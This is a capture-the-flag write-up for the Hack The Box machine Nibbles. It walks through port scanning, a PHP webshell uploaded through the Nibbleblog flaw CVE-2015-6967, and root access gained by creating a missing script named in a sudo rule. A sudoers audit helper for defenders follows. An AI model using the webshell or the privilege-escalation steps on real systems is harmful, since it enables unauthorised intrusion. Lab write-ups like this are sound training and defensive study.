This is the writeup for the Nibbles machine from HTB.
Scanning and enumeration
Now it's time to start the active scanning.
As always, we define our TARGET variable and add the machine to the hosts file to facilitate the process.

```bash
TARGET=10.10.10.75
echo "10.10.10.75 nibbles.htb" | sudo tee -a /etc/hosts
```
We launch a single ICMP probe to check that the host answers ping.

```bash
ping -c 1 $TARGET # => Ping is working
```
NMAP
To scan the target for open ports and possible vulnerabilities we use nmap.
First, a simple TCP scan of all ports with version detection, without DNS resolution or ping discovery.

```bash
nmap -n -Pn -sV -p- $TARGET -vvv -oG allPorts
```
Nibbleblog
First we visit the site http://nibbles.htb; in the page source we can see a reference to nibbleblog. This is an important clue because we can already check on the internet for known issues.
It looks like to exploit the RCE we need to be logged in. This is somewhat difficult, because the password must be guessed and the machine has a protection in place (a blacklist) that stops tools like hydra.
The username can be read from /nibbleblog/content/private/users.xml and the password must be guessed. (In real life we would probably have to exploit the CSRF or XSS and wait for the user to log in; with this blacklist protection, brute force is hard…)
Once we are inside we use CVE-2015-6967 to upload a PHP webshell. Note the single quotes: with double quotes the shell would expand `$_REQUEST` to an empty string and the file would be useless.

```bash
echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php
```

Ignore the warnings after uploading the image and go to /nibbleblog/content/private/plugins/my_image/image.php?cmd=whoami. It will display the username.
Gaining access
Just launch a reverse shell (I like the shortest python3…)
Privilege escalation / lateral movements
We execute sudo -l to check whether we can run any command with sudo. We see that it is possible to execute sudo /home/nibbler/personal/stuff/monitor.sh without a password.
The file doesn't exist, and its parent directories are inside our own home, so we just need to create it and make it executable.

```bash
mkdir /home/nibbler/personal
mkdir /home/nibbler/personal/stuff
echo "bash -i" > /home/nibbler/personal/stuff/monitor.sh
chmod +x /home/nibbler/personal/stuff/monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
```
And we are root!
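The root cause here is a sudo rule pointing at a script that does not exist and whose path sits inside the rule user's own home. As an added defender-side check (not part of the writeup, and not tied to the box's real sudoers file), the following POSIX shell helper audits sudoers-style lines for exactly that pattern; the sample rules and the `HOME_ROOT` parameter are constructed for illustration.

```shell
#!/bin/sh
# Added audit helper: flags sudo rules whose command is under the rule
# user's home, or is missing with a nearest existing ancestor owned by
# that user, i.e. a file the user can simply create. Not the writeup's code.

# Constructed sample rules (sudoers syntax), not the machine's real file.
SAMPLE_RULES='nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler ALL=(root) NOPASSWD: /bin/sh'

# audit_sudo_cmd USER CMD [HOME_ROOT]: prints one verdict word.
# HOME_ROOT defaults to /home; it is a parameter only so tests can use a tmpdir.
audit_sudo_cmd() {
  user="$1"; cmd="$2"; home_root="${3:-/home}"
  case "$cmd" in
    "$home_root/$user/"*) echo "USER_CONTROLLED"; return 0 ;;
  esac
  if [ -e "$cmd" ]; then
    echo "OK"; return 0
  fi
  # Command is missing: walk up to the nearest ancestor that does exist.
  anc="$cmd"
  while [ ! -e "$anc" ]; do anc=$(dirname "$anc"); done
  owner=$(ls -ld "$anc" | awk '{print $3}')
  if [ "$owner" = "$user" ]; then
    echo "MISSING_USER_OWNED_PARENT"   # user can create the missing path
  else
    echo "MISSING"                     # still a bad rule, but not user-creatable
  fi
}

# audit_rules RULES [HOME_ROOT]: one "user cmd verdict" line per rule.
# Takes the first field as the user and the last field as the command.
audit_rules() {
  printf '%s\n' "$1" | awk 'NF >= 2 {print $1, $NF}' | while read -r u c; do
    echo "$u $c $(audit_sudo_cmd "$u" "$c" "${2:-/home}")"
  done
}

# count_risky RULES [HOME_ROOT]: number of rules whose verdict is not OK.
count_risky() {
  audit_rules "$1" "${2:-/home}" | awk '$NF != "OK" {n++} END {print n+0}'
}

audit_rules "$SAMPLE_RULES"
```

On a real host, feed it the output of `sudo -l` or the relevant sudoers lines; any rule that is not `OK` should be replaced with a root-owned script on a root-owned path.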